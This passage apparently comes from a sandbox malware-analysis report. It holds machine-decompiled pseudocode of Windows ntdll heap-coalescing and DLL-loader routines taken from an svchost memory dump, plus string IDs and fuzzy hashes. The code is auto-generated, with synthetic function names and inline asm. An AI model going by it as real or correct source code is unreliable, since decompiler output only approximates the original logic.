                        				signed short _t384;
                        				signed int _t386;
                        				unsigned int _t390;
                        				signed int _t393;
                        				signed int* _t394;
                        				unsigned int _t398;
                        				signed short _t400;
                        				signed short _t402;
                        				signed int _t404;
                        				signed int _t407;
                        				unsigned int _t411;
                        				signed short* _t414;
                        				signed int _t415;
                        				signed short* _t419;
                        				signed int* _t420;
                        				void* _t421;
                        
                        				_t414 = __edx;
                        				_t307 = __ecx;
                        				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                        				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                        					_v5 = _a8;
                        					L3:
                        					_t381 = _a4;
                        					goto L4;
                        				} else {
                        					__eflags =  *(__ecx + 0x4c);
                        					if( *(__ecx + 0x4c) != 0) {
                        						_t411 =  *(__ecx + 0x50) ^  *_t419;
                        						 *_t419 = _t411;
                        						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                        						__eflags = _t411 >> 0x18 - _t378;
                        						if(__eflags != 0) {
                        							_push(_t378);
                        							E030DFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                        						}
                        					}
                        					_t250 = _a8;
                        					_v5 = _t250;
                        					__eflags = _t250;
                        					if(_t250 != 0) {
                        						_t400 = _t414[6];
                        						_t53 =  &(_t414[4]); // -16
                        						_t348 = _t53;
                        						_t251 =  *_t348;
                        						_v12 = _t251;
                        						_v16 = _t400;
                        						_t252 =  *((intOrPtr*)(_t251 + 4));
                        						__eflags =  *_t400 - _t252;
                        						if( *_t400 != _t252) {
                        							L49:
                        							_push(_t348);
                        							_push( *_t400);
                        							E030EA80D(_t307, 0xd, _t348, _t252);
                        							L50:
                        							_v5 = 0;
                        							goto L11;
                        						}
                        						__eflags =  *_t400 - _t348;
                        						if( *_t400 != _t348) {
                        							goto L49;
                        						}
                        						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                        						_t407 =  *(_t307 + 0xb4);
                        						__eflags = _t407;
                        						if(_t407 == 0) {
                        							L36:
                        							_t364 = _v16;
                        							_t282 = _v12;
                        							 *_t364 = _t282;
                        							 *((intOrPtr*)(_t282 + 4)) = _t364;
                        							__eflags = _t414[1] & 0x00000008;
                        							if((_t414[1] & 0x00000008) == 0) {
                        								L39:
                        								_t365 = _t414[1];
                        								__eflags = _t365 & 0x00000004;
                        								if((_t365 & 0x00000004) != 0) {
                        									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                        									_v12 = _t284;
                        									__eflags = _t365 & 0x00000002;
                        									if((_t365 & 0x00000002) != 0) {
                        										__eflags = _t284 - 4;
                        										if(_t284 > 4) {
                        											_t284 = _t284 - 4;
                        											__eflags = _t284;
                        											_v12 = _t284;
                        										}
                        									}
                        									_t78 =  &(_t414[8]); // -8
                        									_t286 = E0307D540(_t78, _t284, 0xfeeefeee);
                        									_v16 = _t286;
                        									__eflags = _t286 - _v12;
                        									if(_t286 != _v12) {
                        										_t366 =  *[fs:0x30];
                        										__eflags =  *(_t366 + 0xc);
                        										if( *(_t366 + 0xc) == 0) {
                        											_push("HEAP: ");
                        											E0302B150();
                        										} else {
                        											E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        										}
                        										_push(_v16 + 0x10 + _t414);
                        										E0302B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                        										_t292 =  *[fs:0x30];
                        										_t421 = _t421 + 0xc;
                        										__eflags =  *((char*)(_t292 + 2));
                        										if( *((char*)(_t292 + 2)) != 0) {
                        											 *0x3116378 = 1;
                        											asm("int3");
                        											 *0x3116378 = 0;
                        										}
                        									}
                        								}
                        								goto L50;
                        							}
                        							_t296 = E0304A229(_t307, _t414);
                        							__eflags = _t296;
                        							if(_t296 != 0) {
                        								goto L39;
                        							} else {
                        								E0304A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                        								goto L50;
                        							}
                        						} else {
                        							_t373 =  *_t414 & 0x0000ffff;
                        							while(1) {
                        								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                        								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                        									_t301 = _t373;
                        									break;
                        								}
                        								_t299 =  *_t407;
                        								__eflags = _t299;
                        								if(_t299 == 0) {
                        									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                        									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                        									break;
                        								} else {
                        									_t407 = _t299;
                        									continue;
                        								}
                        							}
                        							_t62 =  &(_t414[4]); // -16
                        							E0304BC04(_t307, _t407, 1, _t62, _t301, _t373);
                        							goto L36;
                        						}
                        					}
                        					L11:
                        					_t402 = _t419[6];
                        					_t25 =  &(_t419[4]); // -16
                        					_t350 = _t25;
                        					_t254 =  *_t350;
                        					_v12 = _t254;
                        					_v20 = _t402;
                        					_t255 =  *((intOrPtr*)(_t254 + 4));
                        					__eflags =  *_t402 - _t255;
                        					if( *_t402 != _t255) {
                        						L61:
                        						_push(_t350);
                        						_push( *_t402);
                        						E030EA80D(_t307, 0xd, _t350, _t255);
                        						goto L3;
                        					}
                        					__eflags =  *_t402 - _t350;
                        					if( *_t402 != _t350) {
                        						goto L61;
                        					}
                        					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                        					_t404 =  *(_t307 + 0xb4);
                        					__eflags = _t404;
                        					if(_t404 == 0) {
                        						L20:
                        						_t352 = _v20;
                        						_t258 = _v12;
                        						 *_t352 = _t258;
                        						 *(_t258 + 4) = _t352;
                        						__eflags = _t419[1] & 0x00000008;
                        						if((_t419[1] & 0x00000008) != 0) {
                        							_t259 = E0304A229(_t307, _t419);
                        							__eflags = _t259;
                        							if(_t259 != 0) {
                        								goto L21;
                        							} else {
                        								E0304A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                        								goto L3;
                        							}
                        						}
                        						L21:
                        						_t354 = _t419[1];
                        						__eflags = _t354 & 0x00000004;
                        						if((_t354 & 0x00000004) != 0) {
                        							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                        							__eflags = _t354 & 0x00000002;
                        							if((_t354 & 0x00000002) != 0) {
                        								__eflags = _t415 - 4;
                        								if(_t415 > 4) {
                        									_t415 = _t415 - 4;
                        									__eflags = _t415;
                        								}
                        							}
                        							_t91 =  &(_t419[8]); // -8
                        							_t262 = E0307D540(_t91, _t415, 0xfeeefeee);
                        							_v20 = _t262;
                        							__eflags = _t262 - _t415;
                        							if(_t262 != _t415) {
                        								_t357 =  *[fs:0x30];
                        								__eflags =  *(_t357 + 0xc);
                        								if( *(_t357 + 0xc) == 0) {
                        									_push("HEAP: ");
                        									E0302B150();
                        								} else {
                        									E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        								}
                        								_push(_v20 + 0x10 + _t419);
                        								E0302B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                        								_t271 =  *[fs:0x30];
                        								_t421 = _t421 + 0xc;
                        								__eflags =  *((char*)(_t271 + 2));
                        								if( *((char*)(_t271 + 2)) != 0) {
                        									 *0x3116378 = 1;
                        									asm("int3");
                        									 *0x3116378 = 0;
                        								}
                        							}
                        						}
                        						_t381 = _a4;
                        						_t414 = _t419;
                        						_t419[1] = 0;
                        						_t419[3] = 0;
                        						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                        						 *_t419 =  *_t381;
                        						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                        						L4:
                        						_t420 = _t414 +  *_t381 * 8;
                        						if( *(_t307 + 0x4c) == 0) {
                        							L6:
                        							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                        								__eflags =  *(_t307 + 0x4c);
                        								if( *(_t307 + 0x4c) != 0) {
                        									_t390 =  *(_t307 + 0x50) ^  *_t420;
                        									 *_t420 = _t390;
                        									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                        									__eflags = _t390 >> 0x18 - _t328;
                        									if(__eflags != 0) {
                        										_push(_t328);
                        										E030DFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                        									}
                        								}
                        								__eflags = _v5;
                        								if(_v5 == 0) {
                        									L94:
                        									_t382 = _t420[3];
                        									_t137 =  &(_t420[2]); // -16
                        									_t309 = _t137;
                        									_t186 =  *_t309;
                        									_v20 = _t186;
                        									_v16 = _t382;
                        									_t187 =  *((intOrPtr*)(_t186 + 4));
                        									__eflags =  *_t382 - _t187;
                        									if( *_t382 != _t187) {
                        										L63:
                        										_push(_t309);
                        										_push( *_t382);
                        										_push(_t187);
                        										_push(_t309);
                        										_push(0xd);
                        										L64:
                        										E030EA80D(_t307);
                        										continue;
                        									}
                        									__eflags =  *_t382 - _t309;
                        									if( *_t382 != _t309) {
                        										goto L63;
                        									}
                        									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                        									_t393 =  *(_t307 + 0xb4);
                        									__eflags = _t393;
                        									if(_t393 == 0) {
                        										L104:
                        										_t330 = _v16;
                        										_t190 = _v20;
                        										 *_t330 = _t190;
                        										 *(_t190 + 4) = _t330;
                        										__eflags = _t420[0] & 0x00000008;
                        										if((_t420[0] & 0x00000008) == 0) {
                        											L107:
                        											_t331 = _t420[0];
                        											__eflags = _t331 & 0x00000004;
                        											if((_t331 & 0x00000004) != 0) {
                        												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                        												_v12 = _t196;
                        												__eflags = _t331 & 0x00000002;
                        												if((_t331 & 0x00000002) != 0) {
                        													__eflags = _t196 - 4;
                        													if(_t196 > 4) {
                        														_t196 = _t196 - 4;
                        														__eflags = _t196;
                        														_v12 = _t196;
                        													}
                        												}
                        												_t162 =  &(_t420[4]); // -8
                        												_t197 = E0307D540(_t162, _t196, 0xfeeefeee);
                        												_v20 = _t197;
                        												__eflags = _t197 - _v12;
                        												if(_t197 != _v12) {
                        													_t335 =  *[fs:0x30];
                        													__eflags =  *(_t335 + 0xc);
                        													if( *(_t335 + 0xc) == 0) {
                        														_push("HEAP: ");
                        														E0302B150();
                        													} else {
                        														E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        													}
                        													_push(_v20 + 0x10 + _t420);
                        													E0302B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                        													_t203 =  *[fs:0x30];
                        													__eflags =  *((char*)(_t203 + 2));
                        													if( *((char*)(_t203 + 2)) != 0) {
                        														 *0x3116378 = 1;
                        														asm("int3");
                        														 *0x3116378 = 0;
                        													}
                        												}
                        											}
                        											_t394 = _a4;
                        											_t414[1] = 0;
                        											_t414[3] = 0;
                        											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                        											 *_t414 =  *_t394;
                        											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                        											break;
                        										}
                        										_t207 = E0304A229(_t307, _t420);
                        										__eflags = _t207;
                        										if(_t207 != 0) {
                        											goto L107;
                        										}
                        										E0304A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                        										continue;
                        									}
                        									_t342 =  *_t420 & 0x0000ffff;
                        									while(1) {
                        										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                        										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                        											break;
                        										}
                        										_t210 =  *_t393;
                        										__eflags = _t210;
                        										if(_t210 == 0) {
                        											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                        											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                        											L103:
                        											_t146 =  &(_t420[2]); // -16
                        											E0304BC04(_t307, _t393, 1, _t146, _t212, _t342);
                        											goto L104;
                        										}
                        										_t393 = _t210;
                        									}
                        									_t212 = _t342;
                        									goto L103;
                        								} else {
                        									_t384 = _t414[6];
                        									_t102 =  &(_t414[4]); // -16
                        									_t311 = _t102;
                        									_t215 =  *_t311;
                        									_v20 = _t215;
                        									_v16 = _t384;
                        									_t216 =  *((intOrPtr*)(_t215 + 4));
                        									__eflags =  *_t384 - _t216;
                        									if( *_t384 != _t216) {
                        										L92:
                        										_push(_t311);
                        										_push( *_t384);
                        										E030EA80D(_t307, 0xd, _t311, _t216);
                        										L93:
                        										_v5 = 0;
                        										goto L94;
                        									}
                        									__eflags =  *_t384 - _t311;
                        									if( *_t384 != _t311) {
                        										goto L92;
                        									}
                        									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                        									_t386 =  *(_t307 + 0xb4);
                        									__eflags = _t386;
                        									if(_t386 == 0) {
                        										L79:
                        										_t313 = _v16;
                        										_t219 = _v20;
                        										 *_t313 = _t219;
                        										 *(_t219 + 4) = _t313;
                        										__eflags = _t414[1] & 0x00000008;
                        										if((_t414[1] & 0x00000008) == 0) {
                        											L82:
                        											_t314 = _t414[1];
                        											__eflags = _t314 & 0x00000004;
                        											if((_t314 & 0x00000004) != 0) {
                        												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                        												_v12 = _t221;
                        												__eflags = _t314 & 0x00000002;
                        												if((_t314 & 0x00000002) != 0) {
                        													__eflags = _t221 - 4;
                        													if(_t221 > 4) {
                        														_t221 = _t221 - 4;
                        														__eflags = _t221;
                        														_v12 = _t221;
                        													}
                        												}
                        												_t127 =  &(_t414[8]); // -8
                        												_t222 = E0307D540(_t127, _t221, 0xfeeefeee);
                        												_v20 = _t222;
                        												__eflags = _t222 - _v12;
                        												if(_t222 != _v12) {
                        													_t316 =  *[fs:0x30];
                        													__eflags =  *(_t316 + 0xc);
                        													if( *(_t316 + 0xc) == 0) {
                        														_push("HEAP: ");
                        														E0302B150();
                        													} else {
                        														E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        													}
                        													_push(_v20 + 0x10 + _t414);
                        													E0302B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                        													_t228 =  *[fs:0x30];
                        													_t421 = _t421 + 0xc;
                        													__eflags =  *((char*)(_t228 + 2));
                        													if( *((char*)(_t228 + 2)) != 0) {
                        														 *0x3116378 = 1;
                        														asm("int3");
                        														 *0x3116378 = 0;
                        													}
                        												}
                        											}
                        											goto L93;
                        										}
                        										_t232 = E0304A229(_t307, _t414);
                        										__eflags = _t232;
                        										if(_t232 != 0) {
                        											goto L82;
                        										}
                        										E0304A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                        										goto L93;
                        									}
                        									_t323 =  *_t414 & 0x0000ffff;
                        									while(1) {
                        										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                        										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                        											break;
                        										}
                        										_t235 =  *_t386;
                        										__eflags = _t235;
                        										if(_t235 == 0) {
                        											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                        											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                        											L78:
                        											_t111 =  &(_t414[4]); // -16
                        											E0304BC04(_t307, _t386, 1, _t111, _t237, _t323);
                        											goto L79;
                        										}
                        										_t386 = _t235;
                        									}
                        									_t237 = _t323;
                        									goto L78;
                        								}
                        							}
                        							return _t414;
                        						}
                        						_t398 =  *(_t307 + 0x50) ^  *_t420;
                        						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                        						if(_t398 >> 0x18 != _t347) {
                        							_push(_t347);
                        							_push(0);
                        							_push(0);
                        							_push(_t420);
                        							_push(3);
                        							goto L64;
                        						}
                        						goto L6;
                        					} else {
                        						_t277 =  *_t419 & 0x0000ffff;
                        						_v16 = _t277;
                        						while(1) {
                        							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                        							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                        								break;
                        							}
                        							_t279 =  *_t404;
                        							__eflags = _t279;
                        							if(_t279 == 0) {
                        								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                        								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                        								break;
                        							} else {
                        								_t404 = _t279;
                        								_t277 =  *_t419 & 0x0000ffff;
                        								continue;
                        							}
                        						}
                        						E0304BC04(_t307, _t404, 1, _t350, _t277, _v16);
                        						goto L20;
                        					}
                        				}
                        			}


                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                        • API String ID: 0-3178619729
                        • Opcode ID: 3be5ef84d9337a2c5705b4e812347cf458b88379b2636c6ce8d0971e8045a8e5
                        • Instruction ID: 0453031b52b1dbf84c3d26812b7cda39f6199108a30a6499f96382018e713ab7
                        • Opcode Fuzzy Hash: 3be5ef84d9337a2c5705b4e812347cf458b88379b2636c6ce8d0971e8045a8e5
                        • Instruction Fuzzy Hash: 7622D374B02246DFEB28DF28C484BBABBF5EF45704F1885AAE4568B381D735D981CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E03038794(void* __ecx) {
                        				signed int _v0;
                        				char _v8;
                        				signed int _v12;
                        				void* _v16;
                        				signed int _v20;
                        				intOrPtr _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v40;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t77;
                        				signed int _t80;
                        				signed char _t81;
                        				signed int _t87;
                        				signed int _t91;
                        				void* _t92;
                        				void* _t94;
                        				signed int _t95;
                        				signed int _t103;
                        				signed int _t105;
                        				signed int _t110;
                        				signed int _t118;
                        				intOrPtr* _t121;
                        				intOrPtr _t122;
                        				signed int _t125;
                        				signed int _t129;
                        				signed int _t131;
                        				signed int _t134;
                        				signed int _t136;
                        				signed int _t143;
                        				signed int* _t147;
                        				signed int _t151;
                        				void* _t153;
                        				signed int* _t157;
                        				signed int _t159;
                        				signed int _t161;
                        				signed int _t166;
                        				signed int _t168;
                        
                        				_push(__ecx);
                        				_t153 = __ecx;
                        				_t159 = 0;
                        				_t121 = __ecx + 0x3c;
                        				if( *_t121 == 0) {
                        					L2:
                        					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                        					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                        						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                        						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                        						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                        							L6:
                        							if(E0303934A() != 0) {
                        								_t159 = E030AA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                        								__eflags = _t159;
                        								if(_t159 < 0) {
                        									_t81 =  *0x3115780; // 0x0
                        									__eflags = _t81 & 0x00000003;
                        									if((_t81 & 0x00000003) != 0) {
                        										_push(_t159);
                        										E030A5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                        										_t81 =  *0x3115780; // 0x0
                        									}
                        									__eflags = _t81 & 0x00000010;
                        									if((_t81 & 0x00000010) != 0) {
                        										asm("int3");
                        									}
                        								}
                        							}
                        						} else {
                        							_t159 = E0303849B(0, _t122, _t153, _t159, _t180);
                        							if(_t159 >= 0) {
                        								goto L6;
                        							}
                        						}
                        						_t80 = _t159;
                        						goto L8;
                        					} else {
                        						_t125 = 0x13;
                        						asm("int 0x29");
                        						_push(0);
                        						_push(_t159);
                        						_t161 = _t125;
                        						_t87 =  *( *[fs:0x30] + 0x1e8);
                        						_t143 = 0;
                        						_v40 = _t161;
                        						_t118 = 0;
                        						_push(_t153);
                        						__eflags = _t87;
                        						if(_t87 != 0) {
                        							_t118 = _t87 + 0x5d8;
                        							__eflags = _t118;
                        							if(_t118 == 0) {
                        								L46:
                        								_t118 = 0;
                        							} else {
                        								__eflags =  *(_t118 + 0x30);
                        								if( *(_t118 + 0x30) == 0) {
                        									goto L46;
                        								}
                        							}
                        						}
                        						_v32 = 0;
                        						_v28 = 0;
                        						_v16 = 0;
                        						_v20 = 0;
                        						_v12 = 0;
                        						__eflags = _t118;
                        						if(_t118 != 0) {
                        							__eflags = _t161;
                        							if(_t161 != 0) {
                        								__eflags =  *(_t118 + 8);
                        								if( *(_t118 + 8) == 0) {
                        									L22:
                        									_t143 = 1;
                        									__eflags = 1;
                        								} else {
                        									_t19 = _t118 + 0x40; // 0x40
                        									_t156 = _t19;
                        									E03038999(_t19,  &_v16);
                        									__eflags = _v0;
                        									if(_v0 != 0) {
                        										__eflags = _v0 - 1;
                        										if(_v0 != 1) {
                        											goto L22;
                        										} else {
                        											_t128 =  *(_t161 + 0x64);
                        											__eflags =  *(_t161 + 0x64);
                        											if( *(_t161 + 0x64) == 0) {
                        												goto L22;
                        											} else {
                        												E03038999(_t128,  &_v12);
                        												_t147 = _v12;
                        												_t91 = 0;
                        												__eflags = 0;
                        												_t129 =  *_t147;
                        												while(1) {
                        													__eflags =  *((intOrPtr*)(0x3115c60 + _t91 * 8)) - _t129;
                        													if( *((intOrPtr*)(0x3115c60 + _t91 * 8)) == _t129) {
                        														break;
                        													}
                        													_t91 = _t91 + 1;
                        													__eflags = _t91 - 5;
                        													if(_t91 < 5) {
                        														continue;
                        													} else {
                        														_t131 = 0;
                        														__eflags = 0;
                        													}
                        													L37:
                        													__eflags = _t131;
                        													if(_t131 != 0) {
                        														goto L22;
                        													} else {
                        														__eflags = _v16 - _t147;
                        														if(_v16 != _t147) {
                        															goto L22;
                        														} else {
                        															E03042280(_t92, 0x31186cc);
                        															_t94 = E030F9DFB( &_v20);
                        															__eflags = _t94 - 1;
                        															if(_t94 != 1) {
                        															}
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															_t95 = E030561A0( &_v32);
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t71 = _t118 + 0x40; // 0x3f
                        																	_t134 = _t71;
                        																	goto L55;
                        																}
                        															}
                        															goto L30;
                        														}
                        													}
                        													goto L56;
                        												}
                        												_t92 = 0x3115c64 + _t91 * 8;
                        												asm("lock xadd [eax], ecx");
                        												_t131 = (_t129 | 0xffffffff) - 1;
                        												goto L37;
                        											}
                        										}
                        										goto L56;
                        									} else {
                        										_t143 = E03038A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                        										__eflags = _t143;
                        										if(_t143 != 0) {
                        											_t157 = _v12;
                        											_t103 = 0;
                        											__eflags = 0;
                        											_t136 =  &(_t157[1]);
                        											 *(_t161 + 0x64) = _t136;
                        											_t151 =  *_t157;
                        											_v20 = _t136;
                        											while(1) {
                        												__eflags =  *((intOrPtr*)(0x3115c60 + _t103 * 8)) - _t151;
                        												if( *((intOrPtr*)(0x3115c60 + _t103 * 8)) == _t151) {
                        													break;
                        												}
                        												_t103 = _t103 + 1;
                        												__eflags = _t103 - 5;
                        												if(_t103 < 5) {
                        													continue;
                        												}
                        												L21:
                        												_t105 = E0306F380(_t136, 0x3001184, 0x10);
                        												__eflags = _t105;
                        												if(_t105 != 0) {
                        													__eflags =  *_t157 -  *_v16;
                        													if( *_t157 >=  *_v16) {
                        														goto L22;
                        													} else {
                        														asm("cdq");
                        														_t166 = _t157[5] & 0x0000ffff;
                        														_t108 = _t157[5] & 0x0000ffff;
                        														asm("cdq");
                        														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                        														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                        														if(__eflags > 0) {
                        															L29:
                        															E03042280(_t108, 0x31186cc);
                        															 *_t118 =  *_t118 + 1;
                        															_t42 = _t118 + 0x40; // 0x3f
                        															_t156 = _t42;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															_t110 = E030561A0( &_v32);
                        															__eflags = _t110;
                        															if(_t110 != 0) {
                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t134 = _v20;
                        																	L55:
                        																	E030F9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                        																}
                        															}
                        															L30:
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															E0303FFB0(_t118, _t156, 0x31186cc);
                        															goto L22;
                        														} else {
                        															if(__eflags < 0) {
                        																goto L22;
                        															} else {
                        																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                        																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                        																	goto L22;
                        																} else {
                        																	goto L29;
                        																}
                        															}
                        														}
                        													}
                        													goto L56;
                        												}
                        												goto L22;
                        											}
                        											asm("lock inc dword [eax]");
                        											goto L21;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						return _t143;
                        					}
                        				} else {
                        					_push( &_v8);
                        					_push( *((intOrPtr*)(__ecx + 0x50)));
                        					_push(__ecx + 0x40);
                        					_push(_t121);
                        					_push(0xffffffff);
                        					_t80 = E03069A00();
                        					_t159 = _t80;
                        					if(_t159 < 0) {
                        						L8:
                        						return _t80;
                        					} else {
                        						goto L2;
                        					}
                        				}
                        				L56:
                        			}


                        Strings
                        • minkernel\ntdll\ldrsnap.c, xrefs: 03089C28
                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03089C18
                        • LdrpDoPostSnapWork, xrefs: 03089C1E
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-1948996284
                        • Opcode ID: 08bc378b30c4e825c5040941e5ea6cac67b831b5ef98a1624c407dc22869f69b
                        • Instruction ID: 86caa6d1c836a3ec81476ed292d8ebdb074523edb43156ba8b1d0ebbf04c8030
                        • Opcode Fuzzy Hash: 08bc378b30c4e825c5040941e5ea6cac67b831b5ef98a1624c407dc22869f69b
                        • Instruction Fuzzy Hash: 7E91F871A022199FDB58DF58C481ABEB3FDFF86310B5881E9F945AB240D731E949CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E0305AC7B(void* __ecx, signed short* __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* __ebx;
                        				signed char _t75;
                        				signed int _t79;
                        				signed int _t88;
                        				intOrPtr _t89;
                        				signed int _t96;
                        				signed char* _t97;
                        				intOrPtr _t98;
                        				signed int _t101;
                        				signed char* _t102;
                        				intOrPtr _t103;
                        				signed int _t105;
                        				signed char* _t106;
                        				signed int _t131;
                        				signed int _t138;
                        				void* _t149;
                        				signed short* _t150;
                        
                        				_t150 = __edx;
                        				_t149 = __ecx;
                        				_t70 =  *__edx & 0x0000ffff;
                        				__edx[1] = __edx[1] & 0x000000f8;
                        				__edx[3] = 0;
                        				_v8 =  *__edx & 0x0000ffff;
                        				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                        					_t39 =  &(_t150[8]); // 0x8
                        					E0307D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                        					__edx[1] = __edx[1] | 0x00000004;
                        				}
                        				_t75 =  *(_t149 + 0xcc) ^  *0x3118a68;
                        				if(_t75 != 0) {
                        					L4:
                        					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                        						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                        						_t79 =  *(_t149 + 0x50);
                        						 *_t150 =  *_t150 ^ _t79;
                        						return _t79;
                        					}
                        					return _t75;
                        				} else {
                        					_t9 =  &(_t150[0x80f]); // 0x1017
                        					_t138 = _t9 & 0xfffff000;
                        					_t10 =  &(_t150[0x14]); // 0x20
